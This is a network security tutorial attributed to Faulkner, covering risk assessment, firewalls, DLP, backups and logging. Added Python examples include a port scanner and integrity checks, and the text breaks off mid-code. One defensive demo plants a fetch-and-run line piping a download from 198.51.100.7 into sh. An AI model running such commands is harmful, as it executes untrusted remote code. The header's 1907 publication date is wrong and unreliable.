Network Security Best Practices
Copyright 2019, Faulkner Information Services. All Rights Reserved.
Docid: 00018860
Publication Date: 1907
Report Type: TUTORIAL
Preview
In our interconnected world, the network is the gateway to
a corporation. It both enables the conduct of business and
provides one of the biggest security risks.
Over the years, experts have created a series of best
practices designed to mitigate such risks. This report examines
the vulnerabilities and the best practices that enable
companies to protect themselves.
Executive Summary
Data networks are the backbone of today’s
global communications, improving productivity by allowing a large user
population ready access to applications, processing power, and mass storage;
however, access also makes those resources more vulnerable to abuse and misuse.
Networks are vulnerable to myriad attacks from adversaries with
varying motives, including the search for financial gain, corporate
intelligence, publicity, and revenge. Network security
best practices are designed to protect networks against intruders and the
risks of unauthorized access to mission-critical data, information theft, and
malicious file tampering. These breaches could result in immediate financial
loss, litigation, regulatory penalties and, in the long term, loss of confidence in the enterprise and damage to
competitive position. To address vulnerabilities caused by increasing numbers of
employees working from home as well as increasing numbers of users with global
access, organizations are implementing new network security strategies and best
practices.
With properly enforced top-down security
policies and the right tools, effective measures can
be taken to safeguard information during transmission as well as information
stored at various points on the network, including servers and desktop
computers. These tools include firewalls, intrusion detection/prevention systems, remote
authentication systems, and anti-virus software (which today also
guards against various forms of spyware). A framework to build best
practices includes:
- Performing a risk assessment
- Establishing security policies
- Evaluating/implementing security tools
- Responding to violations
Without question, technology trends will come and go, new products will
displace legacy models and intruders will do their best to circumvent most
measures they come up against. Although developing appropriate best
practices and applying technological tools to meet today’s threats should
provide organizations with more secure networks, these actions solve only part
of the problem. The best outlook for network security and best practices has
little to do with state-of-the-art developments and much to do with awareness
and enterprise-wide leadership that buys into the concept that security starts
with policy enforcement. This includes both the policies that are set
for employees and those that are set within software and hardware – as well as
testing of both and solid plans for mitigation.
Description
Network security best practices are necessary to protect today’s complex and
diverse organizations. Building a network security program begins with
taking an asset inventory and performing a risk assessment of the networks. This
is followed by developing and implementing security policies that address the
networks’ risks and vulnerabilities, then deploying the
appropriate tools and personnel to mitigate the risks. Finally, networks should
be audited for their compliance with security policy and variances should be
fixed. Even the most robust best practices, however, cannot be effective unless
they are enforced and employees are trained to understand and support them.
Risk Assessments
To determine the threat level faced by an enterprise, a comprehensive asset inventory and threat assessment must be undertaken. The threat assessment should include a port scan of all network resources. A port is a numbered endpoint for a transport-layer (TCP or UDP) service on a networked device such as a router or server; an open port means a service is listening and will answer anyone who can reach it. A listening service that is unpatched, misconfigured, or reachable from networks that have no need of it is a door through which an attacker can enter and move on to other resources on the corporate network. After the network has been put through a battery of tests, typically with the same scanners attackers themselves use, the findings are presented in summary and detail form. Depending on the tool, each discovered vulnerability is assigned a score indicating its level of risk, and the report can be sorted so that the highest risks appear first. That prioritization lets IT staff close the most serious and exposed holes first, denying attackers easy access to the corporate network. Scanner scores rate the weakness, not the asset; they should be weighted by what the affected system holds or controls before remediation work is ordered.
In addition, a security audit should be conducted
to create a baseline of the organization’s security position. Findings serve to
identify points of entry to the network and possible means of attack from both
an internal and external perspective. It is entirely possible
that compromised endpoints will be discovered during the inventory and audit;
these should be immediately addressed and their impact investigated.
It’s a painful truth that, thanks to mobile devices, the network’s perimeter no
longer stops at the firewall; security personnel have to examine all forms of
access and determine their risk.
Besides assessing hardware and software, risk
levels must also be determined for data that is accessible from the network.
High, medium, or low risk levels should be assigned to the data based on the
effect that lost/leaked data would have on the organization. Data
that, if compromised, could cause legal or financial problems – or even disrupt the
business – should be assessed as high risk and receive
special attention.
After risk levels for network resources are determined, users should be evaluated for their access requirements. "Users," for the purpose of the analysis, should include internal users, both on and offsite, as well as external users such as customers and business partners. Determining risk levels and types of access provides the foundation for securing access control to the network.
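The scan-and-prioritize step described above, as an added example that is not part of the Faulkner report: a minimal TCP connect scan followed by ranking of what it finds, with each finding weighted by the data classification (low, medium, high) of the asset it belongs to. The example scans only 127.0.0.1 and opens its own throwaway listeners, so it runs offline; the service names and risk weights in SERVICE_RISK and DATA_CLASS_WEIGHT are illustrative assumptions, not a vendor's scoring scheme.

```python
# Added example, not from the Faulkner report: a TCP connect scan plus risk
# ranking of the open ports it finds. Scans only 127.0.0.1 and starts its own
# listeners, so it runs offline. Service names and risk weights are illustrative
# assumptions, not a vendor's scoring scheme.
import socket
from dataclasses import dataclass

# Illustrative exposure weights per service (assumption): cleartext or
# historically abused services score higher than encrypted ones.
SERVICE_RISK = {
    21: ("ftp", 8), 22: ("ssh", 5), 23: ("telnet", 9), 25: ("smtp", 5),
    80: ("http", 4), 443: ("https", 3), 445: ("smb", 9), 3389: ("rdp", 8),
}
UNKNOWN_RISK = ("unknown", 5)

# Multiplier taken from the data classification of the asset (assumption).
DATA_CLASS_WEIGHT = {"low": 1, "medium": 2, "high": 3}


@dataclass
class Finding:
    port: int
    service: str
    score: int


def scan_ports(host, ports, timeout=0.25):
    """TCP connect scan: a completed three-way handshake means the port is open.

    connect_ex() returns 0 on success and an errno (e.g. ECONNREFUSED) otherwise,
    so a closed port is reported without raising.
    """
    open_ports = []
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
            sock.settimeout(timeout)
            if sock.connect_ex((host, port)) == 0:
                open_ports.append(port)
    return open_ports


def prioritise(open_ports, data_class="medium"):
    """Score each open port by service exposure times data sensitivity and
    return the findings highest-risk first, so the worst holes are closed first."""
    weight = DATA_CLASS_WEIGHT[data_class]
    findings = []
    for port in open_ports:
        service, base = SERVICE_RISK.get(port, UNKNOWN_RISK)
        findings.append(Finding(port, service, base * weight))
    return sorted(findings, key=lambda f: (-f.score, f.port))


def _listener():
    """Demo helper: a listening socket on an ephemeral loopback port. The kernel
    completes handshakes from the backlog, so no accept() loop is needed."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)
    return srv


def _closed_port():
    """Demo helper: a loopback port that was free a moment ago."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        sock.bind(("127.0.0.1", 0))
        return sock.getsockname()[1]


def demo():
    """Open two listeners, scan them plus one closed port, and rank the result
    as if the host held high-risk data."""
    listeners = [_listener(), _listener()]
    expected_open = sorted(s.getsockname()[1] for s in listeners)
    closed = _closed_port()
    try:
        found = scan_ports("127.0.0.1", expected_open + [closed])
    finally:
        for s in listeners:
            s.close()
    return expected_open, closed, found, prioritise(found, data_class="high")


if __name__ == "__main__":
    expected, closed, found, ranked = demo()
    print("open:", found, "closed:", closed)
    for f in ranked:
        print(f"{f.port:5d}  {f.service:8s} score={f.score}")
```

A connect scan is noisy and completes every handshake, which is exactly what an intrusion detection system should log; run it from an address the security team has registered as an authorized scanner, and treat the scores as a starting order for remediation rather than as a measure of the asset's true importance.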
Security Policies
Network security best practices begin with
top-down policies that are embraced – and enforced – throughout the organization.
Policy begins with a prioritized, clear understanding of what needs to be
protected and what threats and vulnerabilities need to be protected against.
Network security policies become reality only when individual responsibilities
are understood and deviations from those responsibilities are discovered,
analyzed, and properly managed to prevent or stave off future occurrences.
Organizations should create policy statements,
taking into consideration the organizational structure, individual roles and
responsibilities, existing policies, and service level agreements. Policy
statements should include procedures for immediately responding to security breaches that
could occur. In the event of a violation, response policies should also
state which changes can be made without management approval.
Security Teams. As part of the policies,
organizations should establish cross-functional security teams that know
security policy and how it translates into security technology. Members would be
responsible for responding to security breaches and reporting to senior
management. Additionally, the team should be responsible for approving security
changes and a member should sit on the organization’s change management team. In
the past, security was simply one small part of the IT department. Today, that
has evolved so that all areas of IT – from servers to cloud computing to
applications – must encompass security so as to have the entire network
protected.
Network Security Tools
Once policies and assessment vehicles are in
place, the most effective technology-based security measures an enterprise can implement are
firewalls, intrusion detection/prevention systems, remote authentication
systems, anti-virus software, and forensic analysis tools. Additionally, many
organizations implement physical security measures, employ manual or automated
patch management systems, and utilize encryption for critical data in transit.
These solutions are available in the form of dedicated hardware, software, and
managed services.
Firewalls. Firewalls provide a checkpoint between a "trusted" internal network and an "untrusted" network, such as the Internet. They implement perimeter security by examining all traffic to and from the enterprise network and forwarding or dropping each packet according to predefined rules. The network security administrator controls how filtering is performed, permitting or denying connections by source and destination host or network and by type of network service; stateful firewalls additionally track connection state, so that only replies to connections the rules have already permitted are admitted. Rules are evaluated in order and the first match decides, so their ordering matters as much as their content, and traffic that matches no rule should be dropped by default.
Encryption. By encrypting data, both in transit and at rest, organizations can further protect critical information. Use current, well-reviewed algorithms and protocols (for example, TLS for data in transit), with key lengths appropriate to the sensitivity of the data, and manage the keys separately from the data they protect: encrypted data whose key sits beside it on the same disk or share is not protected against the intruder who takes both.
Intrusion Detection/Prevention Systems. Intrusion detection/prevention systems are real-time tools that monitor for suspicious or unauthorized activity on all major operating systems, Web servers, firewalls, routers, applications, and databases. A detection system alerts the security administrator; a prevention system can additionally terminate offending sessions, block the offending address, shut down affected systems, or run other scripted actions to stop attacks in progress before critical systems are damaged or sensitive information is compromised. Because these automated responses act on whatever the sensor classifies as an attack, they must be tuned to avoid false positives that disrupt legitimate users.
Antivirus Software. Antivirus software stops attacks that corrupt data and harm applications. Most antivirus products can be configured either to identify changes being made to files and flag them for attention, or to identify and remove viruses and repair the damage they inflict, as the administrator requires. Questionable files can be quarantined for further analysis. Antivirus software can be installed on every endpoint (including mobile devices) to prevent the spread of viruses through file sharing, but large organizations also install it on their servers to prevent infections from the Internet. Much of today's antivirus software also looks for spyware and malware such as keyloggers or back doors that might allow a criminal to take control of the machine and use it in a botnet, and for suspicious activity that could indicate exploitation of vulnerabilities. Many products also employ cloud-based services that can safely evaluate suspicious content and quickly provide mitigation for threats.
Data Loss Prevention. Data loss prevention (DLP) tools are
software programs that monitor access to – and help prevent the
unauthorized distribution of – sensitive data. A relatively new
form of security service, data loss prevention, also known as "data
leak prevention" or "outbound content management," is
intended to protect an organization against the financial loss, operational impact, and brand damage
associated with data breaches, especially high-profile exposures
involving employee or customer personally identifiable information (PII). Also, by helping safeguard confidential or proprietary information, data loss prevention tools help organizations comply with data protection mandates such as the Health Insurance Portability and Accountability Act (HIPAA).
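The content inspection a DLP tool performs on outbound mail or uploads, as an added example that is not part of the Faulkner report: it looks for US Social Security numbers and payment card numbers, validates card candidates with the Luhn check so that arbitrary 16-digit strings are not flagged, and returns a verdict together with a redacted copy of the message. The sample messages and the one-hit block threshold are constructed for the example; a real policy would add more identifiers and per-channel rules.

```python
# Added example, not from the Faulkner report: outbound content inspection of
# the kind a DLP tool applies to e-mail or uploads. Patterns, sample text and
# the block threshold are constructed for the example.
import re

# US SSN: area not 000/666/9xx, group not 00, serial not 0000.
SSN_RE = re.compile(r"\b(?!000|666|9\d\d)\d{3}-(?!00)\d{2}-(?!0000)\d{4}\b")
# 13-19 digits with optional single spaces or dashes between them.
CARD_RE = re.compile(r"\b\d(?:[ -]?\d){12,18}\b")


def luhn_ok(number: str) -> bool:
    """Luhn mod-10 check used by all major card brands; filters out
    phone-number-like digit runs that merely look like card numbers."""
    digits = [int(c) for c in number if c.isdigit()]
    total = 0
    for i, d in enumerate(reversed(digits)):
        if i % 2 == 1:          # every second digit from the right is doubled
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def find_sensitive(text: str):
    """Return (kind, matched_text) for each PII hit, SSNs first then cards."""
    hits = [("ssn", m.group(0)) for m in SSN_RE.finditer(text)]
    for m in CARD_RE.finditer(text):
        if luhn_ok(m.group(0)):
            hits.append(("card", m.group(0)))
    return hits


def redact(text: str) -> str:
    """Mask each hit except its last four characters, for the incident record."""
    for _, value in find_sensitive(text):
        masked = "*" * (len(value) - 4) + value[-4:]
        text = text.replace(value, masked)
    return text


def inspect(message: str, block_threshold: int = 1):
    """Policy decision for one outbound message: 'allow' when nothing sensitive
    is found, 'block' when at least block_threshold items are found."""
    hits = find_sensitive(message)
    verdict = "block" if len(hits) >= block_threshold else "allow"
    return verdict, hits, redact(message)


if __name__ == "__main__":
    # Constructed sample: one SSN, one valid test card number, one digit run
    # that fails Luhn and must not be flagged.
    sample = ("Hi, my SSN is 123-45-6789 and the card is 4111 1111 1111 1111; "
              "ref 1234 5678 9012 3456.")
    verdict, hits, clean = inspect(sample)
    print(verdict, hits)
    print(clean)
```

Regular expressions alone produce a flood of false positives on invoice numbers and phone numbers; the checksum is what makes card detection usable, and the redacted copy is what should reach the incident log, never the original message.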
Forensics. Forensics within the context of networks entails the capture, recording, and analysis of network events to discover the source of security attacks or other problem incidents. Complex forensics solutions examine network relationships regardless of physical topology and let the user visualize traffic patterns as behavioral clusters; they frequently employ big data analytics. Less complicated offerings come in essentially two kinds. Catch-it-as-you-can systems capture every packet passing a chosen observation point and write them to storage for off-line analysis in batch mode; this type of system requires huge amounts of storage. Stop, look, and listen systems analyze each packet in a rudimentary way in memory and save only selected information (typically flow records and extracted metadata) for later analysis; this approach requires less storage but may need a faster processor and a great deal of memory to keep up with incoming traffic.
Data Backups. Often, companies don't realize the criticality of backing up their network data (documents, files, contacts, and so on) until it's too late. Whether it's a natural disaster like a hurricane destroying a company's headquarters or a ransomware attack wiping out an organization's data, backups are a must. Several Florida cities were hit by ransomware attacks in June 2019 and a few decided to pay the ransom to try to get their critical files back. This is a tactic that the FBI and the Department of Justice advise against, since it encourages cybercriminals and, despite payment, there is no guarantee that an organization will be able to retrieve its files. Instead, it pays to be prepared ahead of an incident by backing data up regularly, so that if malware or another incident damages the network, information can be restored. Data should be backed up both locally and offsite, and at least one copy should be offline or otherwise unwritable from the production network: ransomware that can reach a mounted backup share will encrypt it along with everything else. Cloud backup services are widely recommended by experts, subject to the same requirement that production credentials cannot delete or overwrite the retained copies.
Security Certifications. Getting the most
out of network security tools requires trained personnel; certifying
organizations offer a number of certificates based on levels and types of
network security expertise.
Global Information Assurance Certification (GIAC),
an organization founded by the SANS Institute in 1999, offers a variety of
standalone security certifications in specific areas of expertise such as
network protection strategies, malware and data loss prevention, and incident
response.
The nonprofit International Information Systems
Security Certification Consortium (ISC)2 offers one of the leading
security certifications – the Certified Information Systems Security
Professional (CISSP). The CISSP program offers credentials for those responsible
for developing and managing the implementation of security policies, standards
and procedures. Another (ISC)2 certification, the Systems Security
Certified Practitioner (SSCP), is designed for network and systems
administrators involved in security implementations.
The value of these certification programs is widely recognized. Certifications can be stipulated in job descriptions and used as one means of screening candidates during the hiring process, bearing in mind that they attest to knowledge and should be complemented by verification of hands-on skill.
Tools Are Not Enough. The best technologies are useless if the
policies an organization has in place are not enforced. Network security best
practices – organizational security practices in fact – start with appropriate
policy definition, enforcement, continued awareness, and testing. Failure to do
so leaves the entire organization at risk.
Responding to Violations. Averting attacks on an enterprise network is
important, but if an attack succeeds, finding the cause is essential to stopping
further exploitation of the vulnerability. New rules may have to be loaded to
the firewall, for example. In addition, the scope of the damage to the
organization’s network and data must be assessed and remediated and policies re-visited and
revised.
Current View
Today’s best practices are designed to protect networks from intruders, but
who are the most prevalent offenders? And what are their most frequent offenses?
Findings from recent computer crime surveys answer those questions as well as
detail some of the most widely-installed tools to support network security best
practices. Even with best practices to deter these offenses, a lax security
culture can present problems. Some current and general network security best
practices, covering both tools and culture, can be considered.
Intruders. IBM and Ponemon published their joint report, 2018 Cost of a Data Breach Study: Global Overview, which found that the average cost of each stolen or lost record in a data breach increased slightly from $141 in 2017 to $148 in 2018. The average cost of a data breach, as determined from the nearly 500 companies surveyed, increased from $3.62 million to $3.86 million. The 2018 study also calculated the costs of "mega breaches," which encompass the loss of one million to 50 million records, and found that such breaches had increased from nine in 2013 to 16 in 2017. The average cost of a data breach in which one million records were lost is $40 million; at a loss of 50 million records, breach costs can soar to upwards of $350 million.1
Verizon's Data Breach Investigations Report for 2019 found that 69 percent of breaches were perpetrated by outsiders, 34 percent involved internal actors, two percent involved partners, and five percent featured multiple parties (the categories overlap, which is why they sum to more than 100 percent). Sixteen percent of breaches affected public sector organizations while 15 percent of data incidents impacted healthcare entities.2
Network Offenses. Various tactics are used to compromise networks and exfiltrate data. Breaches can result from ransomware attacks, social engineering, stolen or easy-to-guess passwords, and more. The FBI's Internet Crime Complaint Center (IC3) has repeatedly warned that business email compromise (BEC) and email account compromise (EAC) scams are rampant as criminals take advantage of unsuspecting victims. The scam works because the thieves take over legitimate email accounts, or convincingly impersonate them, through social engineering and use that trust to induce unauthorized wire transfer payments. BEC/EAC schemes are flourishing: in 2018 alone the IC3 received 20,373 complaints about this type of scam, with losses of over $1.2 billion, a major increase from the $675 million lost to BEC scams in 2017.3
Security Tools. To prevent security breaches, organizations use a variety of network security technology tools to support best practices. Firewalls, heuristics-based spam filtering, electronic access control systems, complex passwords, network-based policy enforcement, antivirus software, and encryption are among those commonly used to protect information. Other widely installed security technologies include Internet connection monitoring, anti-spyware, and intrusion detection/prevention. With the insecurity of Internet of Things (IoT) devices regularly making the news, it is important to consider what is available for protecting them. At the very least, experts recommend that default passwords be changed before an IoT device is allowed to reach the Internet, and that such devices be placed on their own network segment so that a compromised one cannot reach workstations and servers directly.
Security Culture. Even
with robust policies, network security best practices are challenging to
implement across global organizations. Problems develop when companies have
locations in regions or countries that have no background in security awareness.
Other security loopholes can exist within acquired companies, business
partnerships, or outsourcing companies. The people factor cannot
be underestimated – the number one technique used in breaches
continues to be social engineering.
Network Security Best Practices
Network security best practices are many and
diverse, often specific to the needs of particular organizations. Some current
and general best practices follow.
1. Develop and Enforce Universal Security Policy. Establishing security policies is critical, enforcing them
stringently across the enterprise in all cases for all employees is imperative.
Far too many organizations spend large portions of security budgets on
technologies and solutions that hinge on a single factor – security policy
enforcement and review. Without policy enforcement they may as well just be
giving those funds away.
2. Establish and Conduct Ongoing Security
Awareness Training. In order to support best practices, employees
need to understand evolving security policy – and the need for procedures and
technical controls. Training sessions should be attended by all personnel levels
to develop a culture of security awareness, and regular refresher sessions
should be conducted to ensure security remains top-of-mind.
3. Perform Background Checks When Hiring. Recognize
that many security breaches originate from within the organization. Steps
can be taken to minimize this risk when filling sensitive positions. During the
hiring process, for example, ensure that references from past employers are
thoroughly checked, that the applicant’s resume accounts for all time from high
school to the present, and that the applicant’s work experience and education
are not exaggerated. Determining the level of personal responsibility and
reliability of a candidate for employment is crucial, even to the point of
checking a credit report for indebtedness or bankruptcy, or police records for
arrests and convictions.
4. Separate Duties and Limit Access to Critical Functions. In areas of critical function, divide duties among several employees and authorize each individual to access only the resources needed for his or her own job. No single person then has the means to commit fraud or sabotage undetected.
5. Administer Security at the Appropriate Level. Administer security policy at the level that affects the fewest users while still satisfying the need for administration. For example, if a policy is being administered that affects every workstation and user in the enterprise, the policy additions should be made at the highest level, the enterprise level. This means never making an addition at the enterprise level of any policy that is not meant to affect every computer in the enterprise. If a policy affects only the users of a particular computer, the policy additions should be made at the machine level. If a policy is being administered for a particular user or group of users, the policy additions should be made at the user level.
6. Establish a Secure Exit Process for
Employees Who Leave. Upon resignation or dismissal, any computers or devices
issued to the employee should be immediately retrieved and all network privileges
revoked (especially remote access). Employee-owned devices should be
wiped of all corporate data. All encryption keys and administrative passwords that the
employee was privy to throughout the organization should be changed
without delay. Furthermore, that person’s ID badge should be collected
before he or she is escorted from the building. The departing employee’s
email account must be canceled immediately, as well, or set to forward mail to
a supervisor’s email account. The harsh reality of network intrusions from
within the organization justifies such measures.
7. Backup Configuration Information. Regardless of where firewalls and intrusion detection/prevention systems sit and how large the deployment is, keep backup copies of their rule sets. The passwords that protect access to these systems should be kept too, but in a password manager or vault with its own access controls, never in the same document or share as the configurations. A copy of the most recent router configurations should be kept as well, since this information is usually needed to reconfigure the firewall or router after a major system failure. Keeping backup copies of such information also reduces the downtime of these systems, since configurations can be loaded immediately instead of re-entered by hand. If a managed firewall service is used, ensure that the provider maintains backup copies of the rule sets for all locations, along with the firewall passwords, and that you hold a copy of that information.
8. Harden Configurations. If security is to be effective, the access controls of firewalls, intrusion detection/prevention systems, remote authentication systems, servers and software must be changed from their factory-installed defaults before the equipment is placed on the network. Default passwords must be changed, default SSIDs on wireless devices altered, and services and management interfaces that are not needed disabled. Default credentials are published in vendor manuals and in attackers' wordlists, so failing to change them lets an intruder grant himself or herself access at will, and can even let the intruder take control of the security systems away from the administrator. In addition, vendor-released patches should be applied to close known holes; it is best to test patches in a lab before installing them on the live network.
9. Backup All Data. When all else fails, data may have to be reloaded to servers and other devices on the network. But this requires that all data be backed up in the first place. Without this important step, a small breach could become a major incident. Regular backups of enterprise information should be performed, off-line backup tapes or a remote storage site should be maintained, and transported media should be encrypted to ensure the security of data in transit. Periodic test restores should be performed to ensure that all data can be retrieved promptly in case of an emergency; a backup that has never been restored is an assumption, not a control. It is also useful to retain original installation media for software: if a system is compromised, backups taken after the intrusion may contain the attacker's changes, so the system should be rebuilt from known-good originals and only the data restored.
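One routine that serves both the change-flagging described under Antivirus Software (take a hash baseline now, compare later) and the test restore called for in item 9 (back up, restore elsewhere, compare the restored tree with the manifest taken at backup time), as an added example that is not part of the Faulkner report. demo() constructs its own files in a temporary directory, and the .tar.gz it writes is left unencrypted, which item 9 says transported media must not be; wrap the archive with a tool such as gpg or age before it leaves the building.

```python
# Added example, not from the Faulkner report: SHA-256 snapshot of a directory
# tree, a diff between two snapshots, and a backup/restore cycle verified with
# that diff. File names and contents in demo() are constructed for the example.
import hashlib
import os
import tarfile
import tempfile


def snapshot(root):
    """Map each file's path (relative, POSIX-style) to its SHA-256 digest."""
    digests = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            with open(full, "rb") as fh:
                digests[rel] = hashlib.sha256(fh.read()).hexdigest()
    return digests


def diff(baseline, current):
    """Classify every path as added, removed or modified relative to the baseline."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(p for p in baseline.keys() & current.keys()
                           if baseline[p] != current[p]),
    }


def make_backup(src_root, archive_path):
    """Write a .tar.gz of src_root and return the manifest taken at that moment."""
    manifest = snapshot(src_root)
    with tarfile.open(archive_path, "w:gz") as tar:
        for rel in manifest:
            tar.add(os.path.join(src_root, rel), arcname=rel)
    return manifest


def restore(archive_path, dest_root):
    """Extract into dest_root. The 'data' filter (Python 3.12, backported to
    recent 3.8-3.11 releases) refuses members that would escape dest_root."""
    os.makedirs(dest_root, exist_ok=True)
    with tarfile.open(archive_path, "r:gz") as tar:
        try:
            tar.extractall(dest_root, filter="data")
        except TypeError:                     # interpreter without filter support
            tar.extractall(dest_root)


def _write(root, rel, data):
    path = os.path.join(root, rel)
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "w") as fh:
        fh.write(data)


def demo():
    """Return (diff after a clean restore, diff after the restored copy is tampered)."""
    with tempfile.TemporaryDirectory() as work:
        src = os.path.join(work, "src")
        _write(src, "docs/policy.txt", "passwords rotate every 90 days\n")
        _write(src, "etc/fw.rules", "deny in from 10.0.0.0/8\n")
        _write(src, "bin/agent.sh", "#!/bin/sh\necho ok\n")

        archive = os.path.join(work, "backup.tar.gz")
        manifest = make_backup(src, archive)          # baseline at backup time

        restored = os.path.join(work, "restored")
        restore(archive, restored)
        clean = diff(manifest, snapshot(restored))    # test restore: expect no differences

        # Simulate what a compromised or corrupted copy looks like to the same check.
        _write(restored, "bin/agent.sh", "#!/bin/sh\ncurl http://198.51.100.7/x | sh\n")
        os.remove(os.path.join(restored, "etc/fw.rules"))
        _write(restored, "bin/.cache", "")
        tampered = diff(manifest, snapshot(restored))
    return clean, tampered


if __name__ == "__main__":
    clean, tampered = demo()
    print("clean restore:", clean)
    print("after tampering:", tampered)
```

The manifest is the control: it must be taken at backup time and stored with the off-site copy, and the comparison after a restore should be run from a machine other than the one being rebuilt, so that an attacker who owns the host cannot also rewrite the baseline.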
10. Enable Logging and Log Archiving. Logging can help identify suspicious activity on the network. Because the number of items that could be monitored is virtually limitless, it is best to focus first on two key areas: failed login attempts and permission changes. Newer monitoring tools can automate this process, send alerts to administrators if suspicious activity is detected, and monitor many more parameters. Logging also helps security administrators understand how an attack was launched and whether it succeeded. Logs on a compromised host are not reliable, however, because attackers can (and do) edit or delete log entries to cover their tracks, and tools exist that reset the access timestamps on files. Logs should therefore be forwarded as they are written to a separate collector that the monitored hosts cannot modify, and the archived copies protected so that any later alteration can be detected.
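The two checks this item singles out, run over constructed syslog-style lines, plus an HMAC hash chain over the archived entries so that an edited, deleted, or truncated line is detectable: an added example, not part of the Faulkner report. The hostnames, addresses, the year assumed for the syslog timestamps (which carry none), the list of permission-changing commands and the key are all constructed for the example.

```python
# Added example, not from the Faulkner report: failed-login burst detection,
# permission-change detection, and an HMAC hash chain over archived log lines.
# Sample log, addresses, the assumed year and the key are constructed.
import hashlib
import hmac
import os
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample: one brute-force burst, one legitimate login, one sudo
# command that changes group membership, and one isolated failure.
SAMPLE_LOG = """\
Mar 12 09:01:02 host1 sshd[2210]: Failed password for invalid user admin from 198.51.100.23 port 51022 ssh2
Mar 12 09:01:04 host1 sshd[2211]: Failed password for root from 198.51.100.23 port 51023 ssh2
Mar 12 09:01:05 host1 sshd[2212]: Failed password for root from 198.51.100.23 port 51024 ssh2
Mar 12 09:01:07 host1 sshd[2213]: Failed password for root from 198.51.100.23 port 51025 ssh2
Mar 12 09:01:09 host1 sshd[2214]: Failed password for root from 198.51.100.23 port 51026 ssh2
Mar 12 09:03:30 host1 sshd[2290]: Accepted publickey for alice from 10.0.0.12 port 40011 ssh2
Mar 12 09:05:11 host1 sudo:    alice : TTY=pts/0 ; PWD=/home/alice ; USER=root ; COMMAND=/usr/sbin/usermod -aG sudo bob
Mar 12 09:06:40 host1 sshd[2301]: Failed password for bob from 10.0.0.12 port 40012 ssh2
"""

FAILED_RE = re.compile(r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<src>[\d.]+)")
SUDO_RE = re.compile(r"sudo:\s+(?P<user>\S+) :.*COMMAND=(?P<cmd>.+)$")
# Tools whose use under sudo changes who may do what (assumption; extend per site).
PERMISSION_CMDS = {"usermod", "gpasswd", "chmod", "chown", "setfacl", "visudo", "passwd"}
LOG_YEAR = 2019  # syslog lines carry no year; assumed for the sample


def parse_ts(line: str) -> datetime:
    return datetime.strptime(line[:15], "%b %d %H:%M:%S").replace(year=LOG_YEAR)


def failed_login_alerts(lines, threshold=5, window=timedelta(seconds=120)):
    """Alert once per source that produces `threshold` failures inside `window`."""
    recent = defaultdict(deque)
    alerted = {}
    for line in lines:
        m = FAILED_RE.search(line)
        if not m:
            continue
        ts, src = parse_ts(line), m.group("src")
        q = recent[src]
        q.append(ts)
        while q and ts - q[0] > window:      # slide the window forward
            q.popleft()
        if len(q) >= threshold and src not in alerted:
            alerted[src] = len(q)
    return sorted(alerted.items())


def permission_change_alerts(lines):
    """Return (user, command) for every sudo invocation of a permission-changing tool."""
    alerts = []
    for line in lines:
        m = SUDO_RE.search(line)
        if m and os.path.basename(m.group("cmd").split()[0]) in PERMISSION_CMDS:
            alerts.append((m.group("user"), m.group("cmd")))
    return alerts


SEED = b"\x00" * 32


def _link(key: bytes, prev: bytes, line: str) -> bytes:
    return hmac.new(key, prev + line.encode(), hashlib.sha256).digest()


def build_chain(lines, key: bytes):
    """Chain each archived line to its predecessor under a key the logging host
    does not hold (it lives on the collector), returning one hex tag per line."""
    prev, chain = SEED, []
    for line in lines:
        prev = _link(key, prev, line)
        chain.append(prev.hex())
    return chain


def verify_chain(lines, chain, key: bytes) -> int:
    """Return -1 if the archive is intact, else the index of the first bad entry.
    An edited, inserted or deleted line breaks its own link and every one after it."""
    prev = SEED
    for i, expected in enumerate(chain):
        if i >= len(lines):
            return i                                   # entries missing from the end
        prev = _link(key, prev, lines[i])
        if not hmac.compare_digest(prev.hex(), expected):
            return i
    return -1 if len(lines) == len(chain) else len(chain)   # trailing lines without a tag


if __name__ == "__main__":
    lines = SAMPLE_LOG.splitlines()
    print("failed logins:", failed_login_alerts(lines))
    print("permission changes:", permission_change_alerts(lines))
    key = b"collector-held-key"                    # constructed; never on the logging host
    chain = build_chain(lines, key)
    lines[1] = lines[1].replace("198.51.100.23", "10.0.0.99")
    print("first tampered entry:", verify_chain(lines, chain, key))
```

A chain computed and stored on the monitored host adds nothing, because whoever can edit the log can recompute it; the key and the latest tag must be held by the collector, which is the point of shipping logs off the box in the first place.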
11. Document and Maintain a Network Map. Document
and maintain a map of your network. This will help IT staff to respond more
quickly to a security incident. This document will help reinforce everyone’s
understanding of the network. The documentation should include hardware and
software configurations, IP addressing, and router/firewall configurations. It
should include warranty and purchase information for all equipment. Included in this document
should be phone numbers for vendors and consultants as well. With this
list in hand, even a backup system administrator will be able to respond to
security incidents in a timely manner. The information can be stored
in a corporate configuration management database (CMDB), many of which
include visualization tools that present a network map automatically.
12. Implement a Firewall. A firewall is one of the most effective security administration tools. Based on rule sets loaded into the firewall, the passage of traffic into and out of the organization can be restricted by source and destination, specific applications and types of files, users or groups of users, and even time of day for particular resources. Firewall capabilities can be added to existing routers via software. When ordered with a new Internet connection, the service provider can deliver a firewall-equipped router pre-configured and pre-programmed for installation. The firewall can reside at the hub location on the network to protect the branch offices connected to it, further reducing the cost of deployment.
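The rule model behind the firewall descriptions in this report (the Firewalls paragraph under Network Security Tools and item 12 here), as an added example that is not part of the Faulkner report: an ordered rule set evaluated first-match-wins, with anything unmatched dropped. The topology, address ranges and rules are constructed for the example, and the filter is stateless; a production firewall would also track connection state so that replies to permitted connections are admitted.

```python
# Added example, not from the Faulkner report: a first-match packet filter with
# a default-deny policy. Topology, addresses and rule set are constructed.
import ipaddress
from dataclasses import dataclass
from typing import Optional


@dataclass
class Packet:
    direction: str   # "in" (arriving from the untrusted side) or "out"
    src: str
    dst: str
    proto: str       # "tcp", "udp" or "icmp"
    dport: int = 0   # 0 for protocols without ports
    hour: int = 12   # local hour of day, for time-of-day rules


@dataclass
class Rule:
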